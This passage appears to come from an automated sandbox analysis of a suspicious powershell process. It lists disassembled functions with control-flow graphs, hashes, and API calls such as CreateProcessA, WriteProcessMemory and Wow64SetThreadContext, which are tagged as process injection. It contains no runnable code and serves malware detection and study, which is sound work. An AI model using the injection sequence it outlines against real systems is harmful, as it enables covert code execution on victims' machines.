                                                                        • Instruction ID: f2fd2bf185b0797358cc8d912c5ea84def71df5f1055373d3e32e088677b4ceb
                                                                        • Opcode Fuzzy Hash: 86c4003d432b439dbb86fc235548be4a077fd5e4dddbff8a044682c20499da97
                                                                        • Instruction Fuzzy Hash: 85125EB4A01255DFEF24CF98D594A6AB7B2BF85704F15C06AE8099B356CB32EC42CB41
                                                                        Function 0739490D Relevance: 4.2, Strings: 3, Instructions: 475COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi$(fi$</
                                                                        • API String ID: 0-3475497408
                                                                        • Opcode ID: bab4d6c89f736dd68c442887c4cc1991d7e915c0feae187ceca788cacbdd52aa
                                                                        • Instruction ID: af481d9f887c92a126df09f0dcd4096620081ffa662a51324dfb29e0a57c1bc6
                                                                        • Opcode Fuzzy Hash: bab4d6c89f736dd68c442887c4cc1991d7e915c0feae187ceca788cacbdd52aa
                                                                        • Instruction Fuzzy Hash: 52126BB4A00255DFEF24CF98D594F6AB7B2AF85704F25C069E809AB355CB32EC42CB51
                                                                        Function 07391BC8 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1887 7391bc8-7391bda 1888 7391c9a-7391d14 1887->1888 1889 7391be0-7391bf1 1887->1889 1909 7391d40-7391d45 1888->1909 1910 7391d16-7391d24 1888->1910 1892 7391c0b-7391c28 1889->1892 1893 7391bf3-7391bf9 1889->1893 1892->1888 1900 7391c2a-7391c4c 1892->1900 1895 7391bfb 1893->1895 1896 7391bfd-7391c09 1893->1896 1895->1892 1896->1892 1903 7391c4e-7391c54 1900->1903 1904 7391c66-7391c7e 1900->1904 1906 7391c58-7391c64 1903->1906 1907 7391c56 1903->1907 1911 7391c8c-7391c97 1904->1911 1912 7391c80-7391c82 1904->1912 1906->1904 1907->1904 1909->1910 1916 7391d2b-7391d3a 1910->1916 1912->1911 1916->1909
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 84i$84i
                                                                        • API String ID: 0-1526663543
                                                                        • Opcode ID: 31f1632071e96e1d3691a33a5fc39694c6275834e1b321015db076ccac3301cc
                                                                        • Instruction ID: 6b84d4d8c17704071720c13d7f5b8ccbe892e1d3a245957beafb169115a7761a
                                                                        • Opcode Fuzzy Hash: 31f1632071e96e1d3691a33a5fc39694c6275834e1b321015db076ccac3301cc
                                                                        • Instruction Fuzzy Hash: B5415EB070035AABEF145764881176ABFA5DFC5710F948066E988AF381DAB1DD40C7A1
                                                                        Function 06D61DDC Relevance: 2.4, Strings: 1, Instructions: 1182COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1945 6d61ddc-6d61e13 1948 6d61e19-6d61e2b 1945->1948 1949 6d61e34-6d61e58 1948->1949 1950 6d61e2d 1948->1950 1952 6d61e87-6d61ef4 1949->1952 1953 6d61e5a-6d61e7f 1949->1953 1950->1949 1951 6d61efb-6d61f1f 1950->1951 1954 6d61f21-6d61f46 1951->1954 1955 6d61f4e 1951->1955 1952->1951 1953->1952 1954->1955 1959 6d61f58-6d61f8b 1955->1959 1963 6d61f92-6d61f9f 1959->1963 1965 6d61fa5-6d61fd8 1963->1965 1966 6d63c3c-6d63c85 1963->1966 1969 6d62007-6d62014 1965->1969 1970 6d61fda-6d61fff 1965->1970 1966->1948 1969->1966 1971 6d6201a-6d62070 1969->1971 1970->1969 1971->1966 1978 6d62076-6d620e1 1971->1978 1985 6d620e7-6d62122 1978->1985 1986 6d626d8-6d626fc 1978->1986 1994 6d62124-6d62149 1985->1994 1995 6d62151-6d6215e 1985->1995 1987 6d626fe-6d62723 1986->1987 1988 6d6272b-6d62738 1986->1988 1987->1988 1988->1966 1989 6d6273e-6d6278d 1988->1989 2004 6d62793-6d62795 1989->2004 2005 6d63c8a-6d63d42 1989->2005 1994->1995 1996 6d62164-6d6218c 1995->1996 1997 6d624cc-6d62515 1995->1997 1996->1997 2003 6d62192-6d621ba 1996->2003 2040 6d625b3-6d625cd 1997->2040 2003->1997 2017 6d621c0-6d62216 2003->2017 2007 6d6279b-6d627ad 2004->2007 2010 6d63d44-6d63d69 2005->2010 2011 6d63d71-6d63da6 2005->2011 2012 6d627b6-6d627da 2007->2012 2013 6d627af 2007->2013 2010->2011 2029 6d63e91-6d63ed5 2011->2029 2030 6d63dac-6d63dda 2011->2030 2014 6d627dc-6d62801 2012->2014 2015 6d62809-6d62869 2012->2015 2013->2012 2018 6d62870-6d62894 2013->2018 2014->2015 2015->2018 2017->1997 2042 6d6221c-6d622b4 2017->2042 2021 6d62896-6d628bb 2018->2021 2022 6d628c3-6d628d0 2018->2022 2021->2022 2025 6d628d6-6d62904 2022->2025 2026 6d63bec-6d63c35 2022->2026 2025->2026 2041 6d6290a-6d62938 2025->2041 2026->2007 2069 6d63eda 2029->2069 2030->2029 2039 6d63de0-6d63e52 2030->2039 2079 6d63e54-6d63e6f 2039->2079 2080 6d63e80-6d63e86 2039->2080 2044 6d625cf-6d625f4 2040->2044 2045 6d625fc-6d62631 2040->2045 2041->2026 2054 6d6293e-6d6296c 2041->2054 2042->1997 2078 6d622ba-6d6234e 2042->2078 2044->2045 2045->1966 2058 6d62637-6d6265b 2045->2058 2054->2026 2065 6d62972-6d62a4f 2054->2065 2058->1966 2067 6d62661-6d626bd 2058->2067 2100 6d62d15-6d62d39 2065->2100 2101 6d62a55-6d62a6f 2065->2101 2092 6d626d3 2067->2092 2093 6d626bf-6d626ce 2067->2093 2069->2069 2078->2040 2102 6d62354-6d6236e 2078->2102 2080->2029 2092->1963 2093->1963 2103 6d62d3b-6d62d60 2100->2103 2104 6d62d68-6d62e7e 2100->2104 2105 6d62a71-6d62a96 2101->2105 2106 6d62a9e-6d62aab 2101->2106 2109 6d62377-6d6239b 2102->2109 2110 6d62370 2102->2110 2103->2104 2152 6d62e84-6d62e9e 2104->2152 2153 6d630e1-6d6310f 2104->2153 2105->2106 2107 6d62ab1-6d62af5 2106->2107 2108 6d62ccc-6d62d10 2106->2108 2107->2108 2128 6d62afb-6d62b1b 2107->2128 2108->2100 2114 6d6239d-6d623c2 2109->2114 2115 6d623ca-6d6241b 2109->2115 2110->2109 2112 6d624c7 2110->2112 2113 6d62422-6d62446 2110->2113 2112->2040 2113->1986 2118 6d6244c-6d62479 2113->2118 2114->2115 2115->2113 2118->1986 2128->2108 2136 6d62b21-6d62b54 2128->2136 2136->2108 2142 6d62b5a-6d62bba 2136->2142 2142->2108 2150 6d62bc0-6d62c6e 2142->2150 2150->2108 2172 6d62c70-6d62cca 2150->2172 2158 6d62ea0-6d62eac 2152->2158 2159 6d62ec8 2152->2159 2170 6d63114-6d63164 2153->2170 2161 6d62eb6-6d62ebc 2158->2161 2162 6d62eae-6d62eb4 2158->2162 2163 6d62ece-6d62f1c 2159->2163 2165 6d62ec6 2161->2165 2162->2165 2163->2153 2175 6d62f22-6d62f37 2163->2175 2165->2163 2170->2026 2172->2100 2181 6d62f51-6d62f86 2175->2181 2182 6d62f39-6d62f3f 2175->2182 2181->2153 2191 6d62f8c-6d62fac 2181->2191 2183 6d62f43-6d62f4f 2182->2183 2184 6d62f41 2182->2184 2183->2181 2184->2181 2191->2153 2193 6d62fb2-6d63096 2191->2193 2193->2153 2204 6d63098-6d630df 2193->2204 2204->2170
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294041535.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi
                                                                        • API String ID: 0-1767130463
                                                                        • Opcode ID: f76a5ce7c1027fb3b748e2cd28f8107f8c57d8d36724edc5c7c9603e0ee17d11
                                                                        • Instruction ID: 5446f23108ee08a408ab3d353011c7daa6a7c294612a3e33a8a2a9f1e1cf940a
                                                                        • Opcode Fuzzy Hash: f76a5ce7c1027fb3b748e2cd28f8107f8c57d8d36724edc5c7c9603e0ee17d11
                                                                        • Instruction Fuzzy Hash: 5AC25FB4A00224DFDB54CB54C894B99B7B2FF84704F5581E9EA09AB341CB72DE82CF95
                                                                        Function 00862610 Relevance: 1.9, APIs: 1, Instructions: 409COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2209 862610-862642 2210 862648-86265e 2209->2210 2211 8626e9-8626f1 2209->2211 2212 862663-862670 2210->2212 2213 862660 2210->2213 2216 862673-862676 2211->2216 2217 8626f3-8626f9 2211->2217 2212->2216 2213->2212 2216->2211 2218 862678 2216->2218 2219 86267b-862685 2217->2219 2220 8626fb-862732 2217->2220 2218->2219 2221 862687 2219->2221 2222 86268a-86269c 2219->2222 2223 862734-86273b 2220->2223 2224 862778 2220->2224 2221->2222 2222->2211 2231 86269e-8626a8 2222->2231 2225 86274c 2223->2225 2226 86273d-86274a 2223->2226 2227 86277b-8627b7 2224->2227 2229 86274e-862750 2225->2229 2226->2229 2235 862833-86283e 2227->2235 2236 8627b9-8627c2 2227->2236 2233 862757-862759 2229->2233 2234 862752-862755 2229->2234 2237 8626b6-8626e8 2231->2237 2238 8626aa-8626ac 2231->2238 2240 86276a 2233->2240 2241 86275b-862768 2233->2241 2239 862776 2234->2239 2242 862840-862843 2235->2242 2243 86284d-86286f 2235->2243 2236->2235 2244 8627c4-8627ca 2236->2244 2238->2237 2239->2227 2245 86276c-86276e 2240->2245 2241->2245 2242->2243 2254 862875-86287e 2243->2254 2255 862930-8629dc 2243->2255 2246 862a64-862ad1 2244->2246 2247 8627d0-8627dd 2244->2247 2245->2239 2261 862ad3-862adf 2246->2261 2262 862ae1-862b1a WriteProcessMemory 2246->2262 2251 8627df-862809 2247->2251 2252 86282a-862831 2247->2252 2268 862826 2251->2268 2269 86280b-86280e 2251->2269 2252->2235 2252->2244 2254->2246 2257 862884-8628b9 2254->2257 2290 8629f6-862a09 2255->2290 2291 8629de-8629f4 2255->2291 2274 8628d3-8628e6 2257->2274 2275 8628bb-8628d1 2257->2275 2261->2262 2265 862b23-862b37 2262->2265 2266 862b1c-862b22 2262->2266 2266->2265 2268->2252 2271 862810-862813 2269->2271 2272 86281a-862823 2269->2272 2271->2272 2277 8628e8-8628ef 2274->2277 2275->2277 2279 862914 2277->2279 2280 8628f1-862902 2277->2280 2279->2255 2280->2279 2284 862904-86290d 2280->2284 2284->2279 2292 862a0b-862a12 2290->2292 2291->2292 2293 862a14-862a1a 2292->2293 2294 862a21 2292->2294 2293->2294 2294->2246
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3260505461.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_860000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c92c59552f0ab0b686aef1178fe03f0d38a1c6d8cb9ec20a0a8705abb8055a50
                                                                        • Instruction ID: ce10652489c74691952ed1d406db5ec5307a7729c85d7e0cb7cc4f3a156a78bf
                                                                        • Opcode Fuzzy Hash: c92c59552f0ab0b686aef1178fe03f0d38a1c6d8cb9ec20a0a8705abb8055a50
                                                                        • Instruction Fuzzy Hash: C7021674A00619DFDB15CF98D884A9EBBB2FF88310F258199E904EB361C771AD81CB90
                                                                        Function 06D9E87C Relevance: 1.7, APIs: 1, Instructions: 214processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2295 6d9e87c-6d9e87d 2296 6d9e859-6d9e863 2295->2296 2297 6d9e87f-6d9e880 2295->2297 2299 6d9e8ff-6d9e904 2297->2299 2300 6d9e882-6d9e8f8 2297->2300 2301 6d9e931-6d9e951 2299->2301 2302 6d9e906-6d9e908 2299->2302 2300->2301 2310 6d9e8fa-6d9e8fe 2300->2310 2312 6d9e98a-6d9e9c4 2301->2312 2313 6d9e953-6d9e95d 2301->2313 2304 6d9e92b-6d9e92e 2302->2304 2305 6d9e90a-6d9e914 2302->2305 2304->2301 2307 6d9e918-6d9e927 2305->2307 2308 6d9e916 2305->2308 2307->2307 2311 6d9e929 2307->2311 2308->2307 2310->2299 2311->2304 2318 6d9e9fd-6d9ea72 CreateProcessA 2312->2318 2319 6d9e9c6-6d9e9d0 2312->2319 2313->2312 2314 6d9e95f-6d9e961 2313->2314 2316 6d9e963-6d9e96d 2314->2316 2317 6d9e984-6d9e987 2314->2317 2320 6d9e96f 2316->2320 2321 6d9e971-6d9e980 2316->2321 2317->2312 2331 6d9ea7b-6d9eac3 2318->2331 2332 6d9ea74-6d9ea7a 2318->2332 2319->2318 2323 6d9e9d2-6d9e9d4 2319->2323 2320->2321 2321->2321 2322 6d9e982 2321->2322 2322->2317 2324 6d9e9f7-6d9e9fa 2323->2324 2325 6d9e9d6-6d9e9e0 2323->2325 2324->2318 2327 6d9e9e2 2325->2327 2328 6d9e9e4-6d9e9f3 2325->2328 2327->2328 2328->2328 2330 6d9e9f5 2328->2330 2330->2324 2337 6d9ead3-6d9ead7 2331->2337 2338 6d9eac5-6d9eac9 2331->2338 2332->2331 2340 6d9ead9-6d9eadd 2337->2340 2341 6d9eae7-6d9eaeb 2337->2341 2338->2337 2339 6d9eacb 2338->2339 2339->2337 2340->2341 2342 6d9eadf 2340->2342 2343 6d9eafb 2341->2343 2344 6d9eaed-6d9eaf1 2341->2344 2342->2341 2346 6d9eafc 2343->2346 2344->2343 2345 6d9eaf3 2344->2345 2345->2343 2346->2346
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D9EA62
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 8b4fab70f4687804d53bb2126ee11410f554fb0c2678540353c9c2751a7f2c1d
                                                                        • Instruction ID: 98b647b8d29f9fa415ab34ff5237997d18410e934970ac7cb50cb8778d4d51f0
                                                                        • Opcode Fuzzy Hash: 8b4fab70f4687804d53bb2126ee11410f554fb0c2678540353c9c2751a7f2c1d
                                                                        • Instruction Fuzzy Hash: 93813271E00259AFDF90CFA9C8817AEBBF1BF48314F148529E859A7250DB759881CFA1
                                                                        Function 06D9E888 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2347 6d9e888-6d9e8f8 2349 6d9e8fa-6d9e904 2347->2349 2350 6d9e931-6d9e951 2347->2350 2349->2350 2352 6d9e906-6d9e908 2349->2352 2356 6d9e98a-6d9e9c4 2350->2356 2357 6d9e953-6d9e95d 2350->2357 2354 6d9e92b-6d9e92e 2352->2354 2355 6d9e90a-6d9e914 2352->2355 2354->2350 2358 6d9e918-6d9e927 2355->2358 2359 6d9e916 2355->2359 2365 6d9e9fd-6d9ea72 CreateProcessA 2356->2365 2366 6d9e9c6-6d9e9d0 2356->2366 2357->2356 2360 6d9e95f-6d9e961 2357->2360 2358->2358 2362 6d9e929 2358->2362 2359->2358 2363 6d9e963-6d9e96d 2360->2363 2364 6d9e984-6d9e987 2360->2364 2362->2354 2367 6d9e96f 2363->2367 2368 6d9e971-6d9e980 2363->2368 2364->2356 2378 6d9ea7b-6d9eac3 2365->2378 2379 6d9ea74-6d9ea7a 2365->2379 2366->2365 2370 6d9e9d2-6d9e9d4 2366->2370 2367->2368 2368->2368 2369 6d9e982 2368->2369 2369->2364 2371 6d9e9f7-6d9e9fa 2370->2371 2372 6d9e9d6-6d9e9e0 2370->2372 2371->2365 2374 6d9e9e2 2372->2374 2375 6d9e9e4-6d9e9f3 2372->2375 2374->2375 2375->2375 2377 6d9e9f5 2375->2377 2377->2371 2384 6d9ead3-6d9ead7 2378->2384 2385 6d9eac5-6d9eac9 2378->2385 2379->2378 2387 6d9ead9-6d9eadd 2384->2387 2388 6d9eae7-6d9eaeb 2384->2388 2385->2384 2386 6d9eacb 2385->2386 2386->2384 2387->2388 2389 6d9eadf 2387->2389 2390 6d9eafb 2388->2390 2391 6d9eaed-6d9eaf1 2388->2391 2389->2388 2393 6d9eafc 2390->2393 2391->2390 2392 6d9eaf3 2391->2392 2392->2390 2393->2393
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D9EA62
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: d45018d3d72b33e268249a0aa88d9fbeb487730936e7a499b182f8ee0760719e
                                                                        • Instruction ID: 4d6b3bd684075d1f70a8e3de250c1473a65f3b6c63a41024203032228420bc88
                                                                        • Opcode Fuzzy Hash: d45018d3d72b33e268249a0aa88d9fbeb487730936e7a499b182f8ee0760719e
                                                                        • Instruction Fuzzy Hash: 93813371D002599FDF90CFA9C8817AEBBF1BF48314F148629E858A7290DB758881CFA1
                                                                        Function 06D4CDBC Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2394 6d4cdbc-6d4ce26 2397 6d4ce5f-6d4cec1 CreateFileA 2394->2397 2398 6d4ce28-6d4ce32 2394->2398 2407 6d4cec3-6d4cec9 2397->2407 2408 6d4ceca-6d4cf0a 2397->2408 2398->2397 2399 6d4ce34-6d4ce36 2398->2399 2400 6d4ce38-6d4ce42 2399->2400 2401 6d4ce59-6d4ce5c 2399->2401 2403 6d4ce44 2400->2403 2404 6d4ce46-6d4ce55 2400->2404 2401->2397 2403->2404 2404->2404 2405 6d4ce57 2404->2405 2405->2401 2407->2408 2413 6d4cf0c-6d4cf10 2408->2413 2414 6d4cf1a 2408->2414 2413->2414 2415 6d4cf12 2413->2415 2416 6d4cf1b 2414->2416 2415->2414 2416->2416
                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 06D4CEB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 2b0cde493fdb9b62e63b3670be8d9c44837dddfc737153eda2ad4b1290c4a733
                                                                        • Instruction ID: 622bc92c2dfcc93892d691c5827f18c9553e0254353fc6cecec401f6e7265a3f
                                                                        • Opcode Fuzzy Hash: 2b0cde493fdb9b62e63b3670be8d9c44837dddfc737153eda2ad4b1290c4a733
                                                                        • Instruction Fuzzy Hash: 91417771D11219EFEB50EFA9C882BEEBFB1BF48710F148529E815A7250DBB59841CF90
                                                                        Function 06D4D5BC Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2417 6d4d5bc-6d4d629 2420 6d4d662-6d4d6bf CreateFileMappingA 2417->2420 2421 6d4d62b-6d4d635 2417->2421 2430 6d4d6c1-6d4d6c7 2420->2430 2431 6d4d6c8-6d4d708 2420->2431 2421->2420 2422 6d4d637-6d4d639 2421->2422 2424 6d4d65c-6d4d65f 2422->2424 2425 6d4d63b-6d4d645 2422->2425 2424->2420 2426 6d4d647 2425->2426 2427 6d4d649-6d4d658 2425->2427 2426->2427 2427->2427 2428 6d4d65a 2427->2428 2428->2424 2430->2431 2436 6d4d718 2431->2436 2437 6d4d70a-6d4d70e 2431->2437 2439 6d4d719 2436->2439 2437->2436 2438 6d4d710 2437->2438 2438->2436 2439->2439
                                                                        APIs
                                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06D4D6AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileMapping
                                                                        • String ID:
                                                                        • API String ID: 524692379-0
                                                                        • Opcode ID: 3a25cbac0275e8c43eb50a35352bae07b49bb8382f39146ed28103b360ae31d3
                                                                        • Instruction ID: 88652222e452f4e5a0d8c0825757b5e93d670e71f8c9d71e1a9d4c19f4d5e448
                                                                        • Opcode Fuzzy Hash: 3a25cbac0275e8c43eb50a35352bae07b49bb8382f39146ed28103b360ae31d3
                                                                        • Instruction Fuzzy Hash: D2417671C00259AFDB50DFA9C885B9EBFF2BF48720F148529E819A7250DBB59881CF91
                                                                        Function 06D4D5C8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2462 6d4d5c8-6d4d629 2464 6d4d662-6d4d6bf CreateFileMappingA 2462->2464 2465 6d4d62b-6d4d635 2462->2465 2474 6d4d6c1-6d4d6c7 2464->2474 2475 6d4d6c8-6d4d708 2464->2475 2465->2464 2466 6d4d637-6d4d639 2465->2466 2468 6d4d65c-6d4d65f 2466->2468 2469 6d4d63b-6d4d645 2466->2469 2468->2464 2470 6d4d647 2469->2470 2471 6d4d649-6d4d658 2469->2471 2470->2471 2471->2471 2472 6d4d65a 2471->2472 2472->2468 2474->2475 2480 6d4d718 2475->2480 2481 6d4d70a-6d4d70e 2475->2481 2483 6d4d719 2480->2483 2481->2480 2482 6d4d710 2481->2482 2482->2480 2483->2483
                                                                        APIs
                                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06D4D6AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileMapping
                                                                        • String ID:
                                                                        • API String ID: 524692379-0
                                                                        • Opcode ID: fed0852cb2e6ba72db9b7e2265a7cd510e8c5c8867d357acb3d4d2bbb4a12ed5
                                                                        • Instruction ID: 74ad56d7b4020176ecca619ffc270a5aa1b06cdafe30ebc44adb17e860b7e95c
                                                                        • Opcode Fuzzy Hash: fed0852cb2e6ba72db9b7e2265a7cd510e8c5c8867d357acb3d4d2bbb4a12ed5
                                                                        • Instruction Fuzzy Hash: 5F417671C002199FDB50EFA9C881B9EBFF2BF48710F148129E819A7250CBB59841CF90
                                                                        Function 06D4CDC8 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2440 6d4cdc8-6d4ce26 2442 6d4ce5f-6d4cec1 CreateFileA 2440->2442 2443 6d4ce28-6d4ce32 2440->2443 2452 6d4cec3-6d4cec9 2442->2452 2453 6d4ceca-6d4cf0a 2442->2453 2443->2442 2444 6d4ce34-6d4ce36 2443->2444 2445 6d4ce38-6d4ce42 2444->2445 2446 6d4ce59-6d4ce5c 2444->2446 2448 6d4ce44 2445->2448 2449 6d4ce46-6d4ce55 2445->2449 2446->2442 2448->2449 2449->2449 2450 6d4ce57 2449->2450 2450->2446 2452->2453 2458 6d4cf0c-6d4cf10 2453->2458 2459 6d4cf1a 2453->2459 2458->2459 2460 6d4cf12 2458->2460 2461 6d4cf1b 2459->2461 2460->2459 2461->2461
                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 06D4CEB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 461af9a5e23199718bc22416cb383b3b1e38efb4e18944c147944adf6e7742f4
                                                                        • Instruction ID: def571ab702b99cdff76a708b57ff2ba605775d194ebe5c0af53c2e04aacce83
                                                                        • Opcode Fuzzy Hash: 461af9a5e23199718bc22416cb383b3b1e38efb4e18944c147944adf6e7742f4
                                                                        • Instruction Fuzzy Hash: 42416571C11249DFDB50EFA9C882BAEBFB1FF48710F148529E815A7250DBB99841CF81
                                                                        Function 06D9F830 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2484 6d9f830-6d9f886 2487 6d9f888-6d9f894 2484->2487 2488 6d9f896-6d9f8d5 WriteProcessMemory 2484->2488 2487->2488 2490 6d9f8de-6d9f90e 2488->2490 2491 6d9f8d7-6d9f8dd 2488->2491 2491->2490
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D9F8C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: d29006d0a14cca4daf612b6d1ade04990533ddab53ed4fcc03a3821b7854f8c0
                                                                        • Instruction ID: dbaa5bc27c1932e03197bb02af36268850ca7cb81f2020dd6bd3436a826f36d9
                                                                        • Opcode Fuzzy Hash: d29006d0a14cca4daf612b6d1ade04990533ddab53ed4fcc03a3821b7854f8c0
                                                                        • Instruction Fuzzy Hash: E42159B18003099FDF50DFAAC881BDEBBF5FF48320F108429E918A7240C7749954CBA1
                                                                        Function 06D9F838 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2495 6d9f838-6d9f886 2497 6d9f888-6d9f894 2495->2497 2498 6d9f896-6d9f8d5 WriteProcessMemory 2495->2498 2497->2498 2500 6d9f8de-6d9f90e 2498->2500 2501 6d9f8d7-6d9f8dd 2498->2501 2501->2500
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D9F8C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 913c50c8003c5a5a36c19c08cdedc9d05abb55b9ddff31c14b10df5af037fc23
                                                                        • Instruction ID: 9139df7b9ebdc161c6430c1d39f3a6e9a9c77c6f63cab4f136f8728672ebbf0a
                                                                        • Opcode Fuzzy Hash: 913c50c8003c5a5a36c19c08cdedc9d05abb55b9ddff31c14b10df5af037fc23
                                                                        • Instruction Fuzzy Hash: C52128B19003499FDF50CFAAC985BDEBBF5FF48320F10842AE518A7240D7789954CBA4
                                                                        Function 06D9EF88 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D9F00E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
